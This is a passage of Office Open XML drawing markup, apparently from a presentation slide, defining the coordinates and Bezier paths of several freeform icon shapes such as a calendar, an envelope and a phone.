                    <a:pt x="53" y="184"/>
                    <a:pt x="53" y="184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23" y="156"/>
                    <a:pt x="0" y="130"/>
                    <a:pt x="0" y="9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7" y="98"/>
                    <a:pt x="17" y="98"/>
                    <a:pt x="17" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="111"/>
                    <a:pt x="22" y="122"/>
                    <a:pt x="30" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="139"/>
                    <a:pt x="49" y="144"/>
                    <a:pt x="62" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="144"/>
                    <a:pt x="86" y="139"/>
                    <a:pt x="94" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="122"/>
                    <a:pt x="105" y="111"/>
                    <a:pt x="105" y="98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130"/>
                    <a:pt x="100" y="156"/>
                    <a:pt x="70" y="160"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="63" y="132"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="132"/>
                    <a:pt x="29" y="116"/>
                    <a:pt x="29" y="97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29" y="56"/>
                    <a:pt x="29" y="56"/>
                    <a:pt x="29" y="56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0" y="17"/>
                    <a:pt x="46" y="0"/>
                    <a:pt x="63" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="0"/>
                    <a:pt x="97" y="16"/>
                    <a:pt x="97" y="36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97" y="116"/>
                    <a:pt x="82" y="132"/>
                    <a:pt x="63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7" name="Freeform 102">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6384F7BA-C4D0-4212-A540-CA9AC2836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45294">
              <a:off x="5837983" y="4025925"/>
              <a:ext cx="800036" cy="801727"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 176 w 200"/>
                <a:gd name="T1" fmla="*/ 0 h 200"/>
                <a:gd name="T2" fmla="*/ 24 w 200"/>
                <a:gd name="T3" fmla="*/ 0 h 200"/>
                <a:gd name="T4" fmla="*/ 0 w 200"/>
                <a:gd name="T5" fmla="*/ 24 h 200"/>
                <a:gd name="T6" fmla="*/ 0 w 200"/>
                <a:gd name="T7" fmla="*/ 200 h 200"/>
                <a:gd name="T8" fmla="*/ 200 w 200"/>
                <a:gd name="T9" fmla="*/ 200 h 200"/>
                <a:gd name="T10" fmla="*/ 200 w 200"/>
                <a:gd name="T11" fmla="*/ 24 h 200"/>
                <a:gd name="T12" fmla="*/ 176 w 200"/>
                <a:gd name="T13" fmla="*/ 0 h 200"/>
                <a:gd name="T14" fmla="*/ 116 w 200"/>
                <a:gd name="T15" fmla="*/ 16 h 200"/>
                <a:gd name="T16" fmla="*/ 128 w 200"/>
                <a:gd name="T17" fmla="*/ 28 h 200"/>
                <a:gd name="T18" fmla="*/ 116 w 200"/>
                <a:gd name="T19" fmla="*/ 40 h 200"/>
                <a:gd name="T20" fmla="*/ 104 w 200"/>
                <a:gd name="T21" fmla="*/ 28 h 200"/>
                <a:gd name="T22" fmla="*/ 116 w 200"/>
                <a:gd name="T23" fmla="*/ 16 h 200"/>
                <a:gd name="T24" fmla="*/ 76 w 200"/>
                <a:gd name="T25" fmla="*/ 16 h 200"/>
                <a:gd name="T26" fmla="*/ 88 w 200"/>
                <a:gd name="T27" fmla="*/ 28 h 200"/>
                <a:gd name="T28" fmla="*/ 76 w 200"/>
                <a:gd name="T29" fmla="*/ 40 h 200"/>
                <a:gd name="T30" fmla="*/ 64 w 200"/>
                <a:gd name="T31" fmla="*/ 28 h 200"/>
                <a:gd name="T32" fmla="*/ 76 w 200"/>
                <a:gd name="T33" fmla="*/ 16 h 200"/>
                <a:gd name="T34" fmla="*/ 36 w 200"/>
                <a:gd name="T35" fmla="*/ 16 h 200"/>
                <a:gd name="T36" fmla="*/ 48 w 200"/>
                <a:gd name="T37" fmla="*/ 28 h 200"/>
                <a:gd name="T38" fmla="*/ 36 w 200"/>
                <a:gd name="T39" fmla="*/ 40 h 200"/>
                <a:gd name="T40" fmla="*/ 24 w 200"/>
                <a:gd name="T41" fmla="*/ 28 h 200"/>
                <a:gd name="T42" fmla="*/ 36 w 200"/>
                <a:gd name="T43" fmla="*/ 16 h 200"/>
                <a:gd name="T44" fmla="*/ 184 w 200"/>
                <a:gd name="T45" fmla="*/ 184 h 200"/>
                <a:gd name="T46" fmla="*/ 16 w 200"/>
                <a:gd name="T47" fmla="*/ 184 h 200"/>
                <a:gd name="T48" fmla="*/ 16 w 200"/>
                <a:gd name="T49" fmla="*/ 56 h 200"/>
                <a:gd name="T50" fmla="*/ 184 w 200"/>
                <a:gd name="T51" fmla="*/ 56 h 200"/>
                <a:gd name="T52" fmla="*/ 184 w 200"/>
                <a:gd name="T53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200">
                  <a:moveTo>
                    <a:pt x="17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0" y="24"/>
                    <a:pt x="200" y="24"/>
                    <a:pt x="200" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="11"/>
                    <a:pt x="189" y="0"/>
                    <a:pt x="176" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="16"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="16"/>
                    <a:pt x="128" y="22"/>
                    <a:pt x="128" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="35"/>
                    <a:pt x="123" y="40"/>
                    <a:pt x="116" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="40"/>
                    <a:pt x="104" y="35"/>
                    <a:pt x="104" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="22"/>
                    <a:pt x="110" y="16"/>
                    <a:pt x="116" y="16"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="76" y="16"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="16"/>
                    <a:pt x="88" y="22"/>
                    <a:pt x="88" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="35"/>
                    <a:pt x="83" y="40"/>
                    <a:pt x="76" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="40"/>
                    <a:pt x="64" y="35"/>
                    <a:pt x="64" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="22"/>
                    <a:pt x="70" y="16"/>
                    <a:pt x="76" y="16"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="16"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="16"/>
                    <a:pt x="48" y="22"/>
                    <a:pt x="48" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="35"/>
                    <a:pt x="43" y="40"/>
                    <a:pt x="36" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="40"/>
                    <a:pt x="24" y="35"/>
                    <a:pt x="24" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="22"/>
                    <a:pt x="30" y="16"/>
                    <a:pt x="36" y="16"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="184" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="184"/>
                    <a:pt x="16" y="184"/>
                    <a:pt x="16" y="184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84" y="18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8" name="Freeform 108">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7841B86-44CC-427E-998D-1D92FB2A6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655417">
              <a:off x="-24404" y="4398739"/>
              <a:ext cx="720725" cy="7080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69" name="Freeform 110">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{573324FF-81D2-47D5-9929-E68AC5E98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200010">
              <a:off x="1099703" y="3104802"/>
              <a:ext cx="750888" cy="738188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 69 w 473"/>
                <a:gd name="T1" fmla="*/ 181 h 465"/>
                <a:gd name="T2" fmla="*/ 10 w 473"/>
                <a:gd name="T3" fmla="*/ 121 h 465"/>
                <a:gd name="T4" fmla="*/ 10 w 473"/>
                <a:gd name="T5" fmla="*/ 240 h 465"/>
                <a:gd name="T6" fmla="*/ 69 w 473"/>
                <a:gd name="T7" fmla="*/ 181 h 465"/>
                <a:gd name="T8" fmla="*/ 464 w 473"/>
                <a:gd name="T9" fmla="*/ 98 h 465"/>
                <a:gd name="T10" fmla="*/ 445 w 473"/>
                <a:gd name="T11" fmla="*/ 0 h 465"/>
                <a:gd name="T12" fmla="*/ 0 w 473"/>
                <a:gd name="T13" fmla="*/ 81 h 465"/>
                <a:gd name="T14" fmla="*/ 85 w 473"/>
                <a:gd name="T15" fmla="*/ 166 h 465"/>
                <a:gd name="T16" fmla="*/ 464 w 473"/>
                <a:gd name="T17" fmla="*/ 98 h 465"/>
                <a:gd name="T18" fmla="*/ 414 w 473"/>
                <a:gd name="T19" fmla="*/ 24 h 465"/>
                <a:gd name="T20" fmla="*/ 440 w 473"/>
                <a:gd name="T21" fmla="*/ 67 h 465"/>
                <a:gd name="T22" fmla="*/ 443 w 473"/>
                <a:gd name="T23" fmla="*/ 83 h 465"/>
                <a:gd name="T24" fmla="*/ 388 w 473"/>
                <a:gd name="T25" fmla="*/ 93 h 465"/>
                <a:gd name="T26" fmla="*/ 355 w 473"/>
                <a:gd name="T27" fmla="*/ 36 h 465"/>
                <a:gd name="T28" fmla="*/ 414 w 473"/>
                <a:gd name="T29" fmla="*/ 24 h 465"/>
                <a:gd name="T30" fmla="*/ 291 w 473"/>
                <a:gd name="T31" fmla="*/ 45 h 465"/>
                <a:gd name="T32" fmla="*/ 324 w 473"/>
                <a:gd name="T33" fmla="*/ 105 h 465"/>
                <a:gd name="T34" fmla="*/ 265 w 473"/>
                <a:gd name="T35" fmla="*/ 117 h 465"/>
                <a:gd name="T36" fmla="*/ 232 w 473"/>
                <a:gd name="T37" fmla="*/ 57 h 465"/>
                <a:gd name="T38" fmla="*/ 291 w 473"/>
                <a:gd name="T39" fmla="*/ 45 h 465"/>
                <a:gd name="T40" fmla="*/ 171 w 473"/>
                <a:gd name="T41" fmla="*/ 69 h 465"/>
                <a:gd name="T42" fmla="*/ 204 w 473"/>
                <a:gd name="T43" fmla="*/ 126 h 465"/>
                <a:gd name="T44" fmla="*/ 144 w 473"/>
                <a:gd name="T45" fmla="*/ 138 h 465"/>
                <a:gd name="T46" fmla="*/ 109 w 473"/>
                <a:gd name="T47" fmla="*/ 79 h 465"/>
                <a:gd name="T48" fmla="*/ 171 w 473"/>
                <a:gd name="T49" fmla="*/ 69 h 465"/>
                <a:gd name="T50" fmla="*/ 97 w 473"/>
                <a:gd name="T51" fmla="*/ 181 h 465"/>
                <a:gd name="T52" fmla="*/ 10 w 473"/>
                <a:gd name="T53" fmla="*/ 268 h 465"/>
                <a:gd name="T54" fmla="*/ 10 w 473"/>
                <a:gd name="T55" fmla="*/ 465 h 465"/>
                <a:gd name="T56" fmla="*/ 473 w 473"/>
                <a:gd name="T57" fmla="*/ 465 h 465"/>
                <a:gd name="T58" fmla="*/ 473 w 473"/>
                <a:gd name="T59" fmla="*/ 181 h 465"/>
                <a:gd name="T60" fmla="*/ 97 w 473"/>
                <a:gd name="T61" fmla="*/ 181 h 465"/>
                <a:gd name="T62" fmla="*/ 376 w 473"/>
                <a:gd name="T63" fmla="*/ 370 h 465"/>
                <a:gd name="T64" fmla="*/ 111 w 473"/>
                <a:gd name="T65" fmla="*/ 370 h 465"/>
                <a:gd name="T66" fmla="*/ 111 w 473"/>
                <a:gd name="T67" fmla="*/ 342 h 465"/>
                <a:gd name="T68" fmla="*/ 376 w 473"/>
                <a:gd name="T69" fmla="*/ 342 h 465"/>
                <a:gd name="T70" fmla="*/ 376 w 473"/>
                <a:gd name="T71" fmla="*/ 370 h 465"/>
                <a:gd name="T72" fmla="*/ 376 w 473"/>
                <a:gd name="T73" fmla="*/ 304 h 465"/>
                <a:gd name="T74" fmla="*/ 111 w 473"/>
                <a:gd name="T75" fmla="*/ 304 h 465"/>
                <a:gd name="T76" fmla="*/ 111 w 473"/>
                <a:gd name="T77" fmla="*/ 275 h 465"/>
                <a:gd name="T78" fmla="*/ 376 w 473"/>
                <a:gd name="T79" fmla="*/ 275 h 465"/>
                <a:gd name="T80" fmla="*/ 376 w 473"/>
                <a:gd name="T81" fmla="*/ 30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3" h="465">
                  <a:moveTo>
                    <a:pt x="69" y="181"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="181"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="464" y="98"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="445" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="81"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464" y="98"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="414" y="24"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="440" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443" y="83"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414" y="24"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="291" y="45"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="324" y="105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265" y="117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291" y="45"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="171" y="69"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="204" y="126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144" y="138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109" y="79"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171" y="69"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="97" y="181"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10" y="268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473" y="465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473" y="181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97" y="181"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="376" y="370"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="111" y="370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111" y="342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376" y="342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376" y="370"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="376" y="304"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="111" y="304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376" y="3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112">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{927AADD0-B45A-42D2-AB7F-82E1C256D7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80850">
              <a:off x="4904703" y="4249179"/>
              <a:ext cx="750888" cy="747713"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 12 w 200"/>
                <a:gd name="T1" fmla="*/ 199 h 199"/>
                <a:gd name="T2" fmla="*/ 0 w 200"/>
                <a:gd name="T3" fmla="*/ 95 h 199"/>
                <a:gd name="T4" fmla="*/ 0 w 200"/>
                <a:gd name="T5" fmla="*/ 72 h 199"/>
                <a:gd name="T6" fmla="*/ 100 w 200"/>
                <a:gd name="T7" fmla="*/ 0 h 199"/>
                <a:gd name="T8" fmla="*/ 200 w 200"/>
                <a:gd name="T9" fmla="*/ 72 h 199"/>
                <a:gd name="T10" fmla="*/ 200 w 200"/>
                <a:gd name="T11" fmla="*/ 95 h 199"/>
                <a:gd name="T12" fmla="*/ 188 w 200"/>
                <a:gd name="T13" fmla="*/ 199 h 199"/>
                <a:gd name="T14" fmla="*/ 180 w 200"/>
                <a:gd name="T15" fmla="*/ 191 h 199"/>
                <a:gd name="T16" fmla="*/ 100 w 200"/>
                <a:gd name="T17" fmla="*/ 138 h 199"/>
                <a:gd name="T18" fmla="*/ 21 w 200"/>
                <a:gd name="T19" fmla="*/ 191 h 199"/>
                <a:gd name="T20" fmla="*/ 148 w 200"/>
                <a:gd name="T21" fmla="*/ 118 h 199"/>
                <a:gd name="T22" fmla="*/ 52 w 200"/>
                <a:gd name="T23" fmla="*/ 67 h 199"/>
                <a:gd name="T24" fmla="*/ 79 w 200"/>
                <a:gd name="T25" fmla="*/ 137 h 199"/>
                <a:gd name="T26" fmla="*/ 121 w 200"/>
                <a:gd name="T27" fmla="*/ 137 h 199"/>
                <a:gd name="T28" fmla="*/ 71 w 200"/>
                <a:gd name="T29" fmla="*/ 142 h 199"/>
                <a:gd name="T30" fmla="*/ 8 w 200"/>
                <a:gd name="T31" fmla="*/ 178 h 199"/>
                <a:gd name="T32" fmla="*/ 186 w 200"/>
                <a:gd name="T33" fmla="*/ 69 h 199"/>
                <a:gd name="T34" fmla="*/ 14 w 200"/>
                <a:gd name="T35" fmla="*/ 69 h 199"/>
                <a:gd name="T36" fmla="*/ 8 w 200"/>
                <a:gd name="T37" fmla="*/ 87 h 199"/>
                <a:gd name="T38" fmla="*/ 16 w 200"/>
                <a:gd name="T39" fmla="*/ 80 h 199"/>
                <a:gd name="T40" fmla="*/ 100 w 200"/>
                <a:gd name="T41" fmla="*/ 25 h 199"/>
                <a:gd name="T42" fmla="*/ 184 w 200"/>
                <a:gd name="T43" fmla="*/ 80 h 199"/>
                <a:gd name="T44" fmla="*/ 192 w 200"/>
                <a:gd name="T45" fmla="*/ 88 h 199"/>
                <a:gd name="T46" fmla="*/ 192 w 200"/>
                <a:gd name="T47" fmla="*/ 100 h 199"/>
                <a:gd name="T48" fmla="*/ 192 w 200"/>
                <a:gd name="T49" fmla="*/ 178 h 199"/>
                <a:gd name="T50" fmla="*/ 68 w 200"/>
                <a:gd name="T51" fmla="*/ 107 h 199"/>
                <a:gd name="T52" fmla="*/ 132 w 200"/>
                <a:gd name="T53" fmla="*/ 111 h 199"/>
                <a:gd name="T54" fmla="*/ 68 w 200"/>
                <a:gd name="T55" fmla="*/ 107 h 199"/>
                <a:gd name="T56" fmla="*/ 132 w 200"/>
                <a:gd name="T57" fmla="*/ 95 h 199"/>
                <a:gd name="T58" fmla="*/ 68 w 200"/>
                <a:gd name="T59" fmla="*/ 99 h 199"/>
                <a:gd name="T60" fmla="*/ 68 w 200"/>
                <a:gd name="T61" fmla="*/ 83 h 199"/>
                <a:gd name="T62" fmla="*/ 132 w 200"/>
                <a:gd name="T63" fmla="*/ 87 h 199"/>
                <a:gd name="T64" fmla="*/ 68 w 200"/>
                <a:gd name="T65" fmla="*/ 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0" h="199">
                  <a:moveTo>
                    <a:pt x="188" y="199"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="199"/>
                    <a:pt x="12" y="199"/>
                    <a:pt x="12" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="199"/>
                    <a:pt x="0" y="194"/>
                    <a:pt x="0" y="18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89"/>
                    <a:pt x="0" y="78"/>
                    <a:pt x="0" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="64"/>
                    <a:pt x="6" y="61"/>
                    <a:pt x="6" y="6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1"/>
                    <a:pt x="200" y="64"/>
                    <a:pt x="200" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="78"/>
                    <a:pt x="200" y="89"/>
                    <a:pt x="200" y="95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0" y="194"/>
                    <a:pt x="195" y="199"/>
                    <a:pt x="188" y="199"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="21" y="191"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="191"/>
                    <a:pt x="180" y="191"/>
                    <a:pt x="180" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="191"/>
                    <a:pt x="185" y="190"/>
                    <a:pt x="187" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="138"/>
                    <a:pt x="100" y="138"/>
                    <a:pt x="100" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="189"/>
                    <a:pt x="13" y="189"/>
                    <a:pt x="13" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="190"/>
                    <a:pt x="18" y="191"/>
                    <a:pt x="21" y="191"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="121" y="137"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="118"/>
                    <a:pt x="148" y="118"/>
                    <a:pt x="148" y="118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9" y="137"/>
                    <a:pt x="79" y="137"/>
                    <a:pt x="79" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="125"/>
                    <a:pt x="100" y="125"/>
                    <a:pt x="100" y="125"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="121" y="137"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="8" y="178"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="142"/>
                    <a:pt x="71" y="142"/>
                    <a:pt x="71" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="99"/>
                    <a:pt x="8" y="99"/>
                    <a:pt x="8" y="99"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="178"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="192" y="80"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="72"/>
                    <a:pt x="186" y="69"/>
                    <a:pt x="186" y="69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8" y="72"/>
                    <a:pt x="8" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="84"/>
                    <a:pt x="8" y="87"/>
                    <a:pt x="8" y="87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88"/>
                    <a:pt x="16" y="83"/>
                    <a:pt x="16" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="75"/>
                    <a:pt x="21" y="73"/>
                    <a:pt x="21" y="7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84" y="75"/>
                    <a:pt x="184" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="83"/>
                    <a:pt x="184" y="89"/>
                    <a:pt x="184" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="88"/>
                    <a:pt x="192" y="88"/>
                    <a:pt x="192" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="88"/>
                    <a:pt x="192" y="81"/>
                    <a:pt x="192" y="80"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="192" y="100"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="142"/>
                    <a:pt x="130" y="142"/>
                    <a:pt x="130" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="178"/>
                    <a:pt x="192" y="178"/>
                    <a:pt x="192" y="178"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="192" y="100"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="68" y="107"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="107"/>
                    <a:pt x="132" y="107"/>
                    <a:pt x="132" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="111"/>
                    <a:pt x="132" y="111"/>
                    <a:pt x="132" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="111"/>
                    <a:pt x="68" y="111"/>
                    <a:pt x="68" y="111"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="68" y="107"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="68" y="95"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="95"/>
                    <a:pt x="132" y="95"/>
                    <a:pt x="132" y="95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68" y="99"/>
                    <a:pt x="68" y="99"/>
                    <a:pt x="68" y="99"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="68" y="95"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="68" y="83"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="83"/>
                    <a:pt x="132" y="83"/>
                    <a:pt x="132" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="87"/>
                    <a:pt x="132" y="87"/>
                    <a:pt x="132" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="87"/>
                    <a:pt x="68" y="87"/>
                    <a:pt x="68" y="87"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="68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113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B1DCBA5-7010-4A95-8F83-52C8DA1A11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65638" y="997812"/>
              <a:ext cx="601663" cy="752475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 143 w 160"/>
                <a:gd name="T1" fmla="*/ 0 h 200"/>
                <a:gd name="T2" fmla="*/ 16 w 160"/>
                <a:gd name="T3" fmla="*/ 0 h 200"/>
                <a:gd name="T4" fmla="*/ 0 w 160"/>
                <a:gd name="T5" fmla="*/ 17 h 200"/>
                <a:gd name="T6" fmla="*/ 0 w 160"/>
                <a:gd name="T7" fmla="*/ 183 h 200"/>
                <a:gd name="T8" fmla="*/ 16 w 160"/>
                <a:gd name="T9" fmla="*/ 200 h 200"/>
                <a:gd name="T10" fmla="*/ 143 w 160"/>
                <a:gd name="T11" fmla="*/ 200 h 200"/>
                <a:gd name="T12" fmla="*/ 160 w 160"/>
                <a:gd name="T13" fmla="*/ 183 h 200"/>
                <a:gd name="T14" fmla="*/ 160 w 160"/>
                <a:gd name="T15" fmla="*/ 17 h 200"/>
                <a:gd name="T16" fmla="*/ 143 w 160"/>
                <a:gd name="T17" fmla="*/ 0 h 200"/>
                <a:gd name="T18" fmla="*/ 78 w 160"/>
                <a:gd name="T19" fmla="*/ 193 h 200"/>
                <a:gd name="T20" fmla="*/ 68 w 160"/>
                <a:gd name="T21" fmla="*/ 183 h 200"/>
                <a:gd name="T22" fmla="*/ 78 w 160"/>
                <a:gd name="T23" fmla="*/ 173 h 200"/>
                <a:gd name="T24" fmla="*/ 88 w 160"/>
                <a:gd name="T25" fmla="*/ 183 h 200"/>
                <a:gd name="T26" fmla="*/ 78 w 160"/>
                <a:gd name="T27" fmla="*/ 193 h 200"/>
                <a:gd name="T28" fmla="*/ 148 w 160"/>
                <a:gd name="T29" fmla="*/ 164 h 200"/>
                <a:gd name="T30" fmla="*/ 12 w 160"/>
                <a:gd name="T31" fmla="*/ 164 h 200"/>
                <a:gd name="T32" fmla="*/ 12 w 160"/>
                <a:gd name="T33" fmla="*/ 12 h 200"/>
                <a:gd name="T34" fmla="*/ 148 w 160"/>
                <a:gd name="T35" fmla="*/ 12 h 200"/>
                <a:gd name="T36" fmla="*/ 148 w 160"/>
                <a:gd name="T37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00">
                  <a:moveTo>
                    <a:pt x="1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52" y="200"/>
                    <a:pt x="160" y="192"/>
                    <a:pt x="160" y="183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7"/>
                    <a:pt x="152" y="0"/>
                    <a:pt x="143" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
